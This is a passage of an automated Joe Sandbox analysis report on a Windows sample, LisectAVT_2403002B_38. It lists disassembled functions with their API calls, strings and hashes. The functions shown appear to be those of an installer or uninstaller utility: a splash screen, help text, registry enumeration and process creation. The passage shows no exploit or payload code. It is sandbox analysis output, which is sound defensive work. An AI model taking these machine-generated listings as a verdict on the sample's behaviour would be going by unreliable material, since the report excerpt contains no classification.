                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: Current Component$NVU File$UninstCommandClass::UninstallGUI$Vh<A${NVCompList_RegKey}${sysdir}\*.nvu
                                  • API String ID: 3853344119-626721777
                                  • Opcode ID: 2c107cd7f6229a9a2880bb8b91567bd054758acad2a109100cbbda8435f40b5d
                                  • Instruction ID: 6a827f7e21cefda99957e67ed3f360bc3c4821829fd0d0c8ba9c95c4a33da572
                                  • Opcode Fuzzy Hash: 2c107cd7f6229a9a2880bb8b91567bd054758acad2a109100cbbda8435f40b5d
                                  • Instruction Fuzzy Hash: 4C31A7706447006BD610AB269C42F6FB6D9EBC4B04F10083FF956B72C2DB79AD45869E
                                  Function 00402BE0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • LoadImageA.USER32(00000000,?,00000000,00000000,00000000,00002050), ref: 00402C33
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • CommandClass::Splash, xrefs: 00402BE2
                                  • Slplash: invalid number of arguments, xrefs: 00402C08
                                  • STATIC, xrefs: 00402C90
                                  • Slplash: Failed to load bitmap %s, xrefs: 00402C46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatImageLoadLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: CommandClass::Splash$STATIC$Slplash: Failed to load bitmap %s$Slplash: invalid number of arguments
                                  • API String ID: 673139762-2071465357
                                  • Opcode ID: 43cb4329e765b79063321ee9de9802ab41771304c365274229d331a9d47fc198
                                  • Instruction ID: e18f303b0d91d8b11d077f509afa21f711458ed26a76a8ff31a7a342f34f5afb
                                  • Opcode Fuzzy Hash: 43cb4329e765b79063321ee9de9802ab41771304c365274229d331a9d47fc198
                                  • Instruction Fuzzy Hash: AC21D7B23803047BF22066719C4AFAB7659DB95B15F10443EF711B51D1DAB8585182ED
                                  Function 00407220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 74COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetParent.USER32 ref: 00407231
                                  • GetDesktopWindow.USER32 ref: 0040723B
                                  • GetWindowRect.USER32(00000000,?), ref: 0040724E
                                  • GetWindowRect.USER32(?,?), ref: 00407256
                                  • CopyRect.USER32(?,?), ref: 00407262
                                  • OffsetRect.USER32(?,?,?), ref: 00407281
                                  • OffsetRect.USER32(?,?,?), ref: 00407296
                                  • OffsetRect.USER32(?,?,?), ref: 004072AB
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000001,?,?), ref: 004072D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Rect$Window$Offset$Time_fputs$CopyDebugDesktopFormatLocalMutexObjectOutputParentReleaseSingleStringWait_fprintf
                                  • String ID: CenterDialog
                                  • API String ID: 937410608-2042424312
                                  • Opcode ID: ab50e3b9249b7b71b8e6dce0a44cfa9ebf21806dcded3e587ac7bcc2f1117c04
                                  • Instruction ID: d7e27fc64b9759a82f7c15c76f301883fe23e8ceee5c39425276940a113b12ce
                                  • Opcode Fuzzy Hash: ab50e3b9249b7b71b8e6dce0a44cfa9ebf21806dcded3e587ac7bcc2f1117c04
                                  • Instruction Fuzzy Hash: 2F2160B6514306AFD300DB68CD81EBBB7ECEBC8700F048A1DB995D3290D774E9058BA6
                                  Function 00401990 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63processsynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 004019AC
                                  • CreateProcessA.KERNEL32 ref: 004019E1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004019F2
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401A02
                                  • CloseHandle.KERNEL32(?), ref: 00401A13
                                  • CloseHandle.KERNEL32(?), ref: 00401A1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseHandleObjectProcessSingleTimeWait_fputs$CodeCreateDebugExitFormatLocalMutexOutputReleaseString_fprintf_memset
                                  • String ID: CommandClass::RunAndWait(%s)$D$Failed to create process$Process terminated
                                  • API String ID: 3694129204-3215276449
                                  • Opcode ID: c4300a1d48f8192342c91c1721271c664df57e9e2a645f4329b5477ab53ea336
                                  • Instruction ID: e9eeae8e62daf794104d350443afa2b02372016967a382820a11fe24c0cb3616
                                  • Opcode Fuzzy Hash: c4300a1d48f8192342c91c1721271c664df57e9e2a645f4329b5477ab53ea336
                                  • Instruction Fuzzy Hash: 421133F59043007FD600EBA5CC45F9B7BECEB98714F00892EB659D3280EB74D9048BAA
                                  Function 00401F00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 160COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleFileNameA.KERNEL32(?,?,00000080), ref: 00401F47
                                  • _sprintf.LIBCMT ref: 00401F90
                                  • _sprintf.LIBCMT ref: 00402026
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _sprintf.LIBCMT ref: 00401FF2
                                  Strings
                                  • %s version %i.%i.%i.%iSyntax: %s %s {%s}Description: %s, xrefs: 00401FEC
                                  • % -16.16s, xrefs: 00401FC1
                                  • CommandClass::Help, xrefs: 00401F25
                                  • % -16.16s, xrefs: 00402019
                                  • %s version %i.%i.%i.%iUsage: %s <Command>Available Commands are:, xrefs: 00401F8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$Time_fputs$DebugFileFormatLocalModuleMutexNameObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: % -16.16s$% -16.16s$%s version %i.%i.%i.%iSyntax: %s %s {%s}Description: %s$%s version %i.%i.%i.%iUsage: %s <Command>Available Commands are:$CommandClass::Help
                                  • API String ID: 1624269812-146118822
                                  • Opcode ID: f944799bb714b71bd2711589acc1117374258f261e431de1edc069fc91496fc4
                                  • Instruction ID: 879513bddeceda4965789a60416288beacbe24351dbb1b0ee1c4ef5772ffc916
                                  • Opcode Fuzzy Hash: f944799bb714b71bd2711589acc1117374258f261e431de1edc069fc91496fc4
                                  • Instruction Fuzzy Hash: 8C51E371600305ABD720DF24CC55FE773A9EF88704F14492EF959AB2C2E779A904C799
                                  Function 00406FA0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 00406FCD
                                  • SendMessageA.USER32(?,00001036,00000000,00000004), ref: 00406FD8
                                  • GetClientRect.USER32(?,?), ref: 00406FE0
                                  • GetSystemMetrics.USER32 ref: 00406FF4
                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00407018
                                  • SendMessageA.USER32(?,00001051,?,Function_00006EE0), ref: 0040705C
                                  • SendMessageA.USER32 ref: 0040707B
                                  Strings
                                  • UninstCommandClass::BuildUninstComponentList, xrefs: 00406FA7
                                  • {sysdir}\*.nvu, xrefs: 0040702B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSend$Time_fputs$ClientDebugFormatLocalMetricsMutexObjectOutputRectReleaseSingleStringSystemWait_fprintf
                                  • String ID: UninstCommandClass::BuildUninstComponentList${sysdir}\*.nvu
                                  • API String ID: 4273050830-52341307
                                  • Opcode ID: c6d35ac2661312c77cfbf154fda682e7d82c1312f619550bf8f10ee11d0bf7a9
                                  • Instruction ID: 57d7a9d9dad677a18fac7781d06c8ef962532908ef1943b4af12a8cfaeb24461
                                  • Opcode Fuzzy Hash: c6d35ac2661312c77cfbf154fda682e7d82c1312f619550bf8f10ee11d0bf7a9
                                  • Instruction Fuzzy Hash: F22129B12043083AE310AB259C85EEF7B9CEF84768F10053EFA55621C1C6B999448AEA
                                  Function 004069F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,?), ref: 00406A17
                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00406A4F
                                  • _memset.LIBCMT ref: 00406ABA
                                  • _memset.LIBCMT ref: 00406AC7
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 00406AE8
                                  • RegCloseKey.ADVAPI32(?), ref: 00406B1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs_memset$CloseDebugEnumFormatInfoLocalMutexObjectOpenOutputQueryReleaseSingleStringValueWait_fprintf
                                  • String ID: Current Reg Key$UninstCommandClass::EnumRegNames
                                  • API String ID: 1581692125-3565483910
                                  • Opcode ID: 4e56f3e8f9213aeeeb81587985ac65e00c95f4601a4d32b169df9d420c8c7fa2
                                  • Instruction ID: 9f431f05003dba35604fff47c1eb3f8f2c39aaf79875c877634485aa0a81bc12
                                  • Opcode Fuzzy Hash: 4e56f3e8f9213aeeeb81587985ac65e00c95f4601a4d32b169df9d420c8c7fa2
                                  • Instruction Fuzzy Hash: 38416271658300ABE310DF55DC85FABB7E8EBC8744F00492EF545A6280D778E948CBAA
                                  Function 004077E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 0040781E
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040782A
                                  • Process32First.KERNEL32 ref: 00407848
                                  • _memset.LIBCMT ref: 0040786B
                                    • Part of subcall function 00407730: _memset.LIBCMT ref: 00407769
                                    • Part of subcall function 00407730: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0040777B
                                  • Process32Next.KERNEL32(00000000,?), ref: 004078B8
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • CloseHandle.KERNEL32(00000000), ref: 004078C2
                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000002,00000000), ref: 004078E5
                                  Strings
                                  • UninstCommandClass::GetProcessId, xrefs: 004077FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess32SnapshotTimeToolhelp32_fputs$DebugFirstFormatLocalMutexNextObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: UninstCommandClass::GetProcessId
                                  • API String ID: 4235377104-1341712864
                                  • Opcode ID: 5afd117d8137f10938b5f1beeb4c3c6a449cb5e6f52a3a520e91c39e3a799413
                                  • Instruction ID: ca748b6b6f4099698702880440fb671c556b27bd1886daaaa6dd1b1c0e2b8d6e
                                  • Opcode Fuzzy Hash: 5afd117d8137f10938b5f1beeb4c3c6a449cb5e6f52a3a520e91c39e3a799413
                                  • Instruction Fuzzy Hash: 6521B6715083006BE220FB559C4ABAB73ECDF84705F00443EF958A62C1EB78A608C6AF
                                  Function 00401BD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetClientRect.USER32(?,?), ref: 00401BEE
                                  • GetWindowRect.USER32(?,?), ref: 00401C06
                                  • BeginDeferWindowPos.USER32(00000001), ref: 00401C46
                                  • DeferWindowPos.USER32(00000000,?,000000FE,?,?,00000032,00000032,00000045), ref: 00401C5A
                                  • EndDeferWindowPos.USER32(00000000), ref: 00401C61
                                  • ShowWindow.USER32(?,00000001), ref: 00401C6A
                                  • UpdateWindow.USER32(?), ref: 00401C71
                                  Strings
                                  • CommandClass::ShowSplash, xrefs: 00401BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Window$Defer$RectTime_fputs$BeginClientDebugFormatLocalMutexObjectOutputReleaseShowSingleStringUpdateWait_fprintf
                                  • String ID: CommandClass::ShowSplash
                                  • API String ID: 183207305-2159241333
